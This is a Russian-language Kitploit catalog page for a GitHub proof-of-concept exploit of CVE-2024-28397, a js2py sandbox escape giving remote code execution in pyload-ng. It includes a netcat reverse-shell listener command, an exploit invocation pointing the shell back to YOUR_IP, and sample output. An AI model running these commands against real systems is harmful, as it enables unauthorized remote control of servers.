Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

Эксплойт PoC для CVE-2024-28397 – удалённое выполнение кода в pyload-ng через обход песочницы js2py

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Удалённое выполнение кода – CVE-2024-28397 (pyload-ng / js2py)

Этот репозиторий содержит Proof-of-Concept (PoC) эксплойт для CVE-2024-28397 — уязвимости удалённого выполнения кода, затрагивающей pyload-ng из-за небезопасного использования js2py.

Дисклеймер:
Данный PoC предназначен только для образовательных и исследовательских целей.
Не используйте его на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за любое неправомерное использование этого кода.


Сведения об уязвимости

  • CVE ID: CVE-2024-28397
  • Компонент: js2py в pyload-ng
  • Воздействие: удалённое выполнение кода (RCE)
  • Вектор атаки: вредоносная JS-нагрузка обходит песочницу js2py и выполняет произвольные системные команды.

Требования и подготовка

Вам понадобятся Python 3.x, библиотека requests и netcat для приёма обратной оболочки (reverse shell).

  • Цель → уязвимый экземпляр pyload-ng с доступной конечной точкой /run_code

Слушатель → запустите перед выполнением эксплойта:

nc -lvnp 4444

Использование:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

Пример вывода:

  • [+] Регистрация прошла успешно!
  • [+] Вход выполнен успешно
  • [+] Эксплойт сработал
Скачать инструмент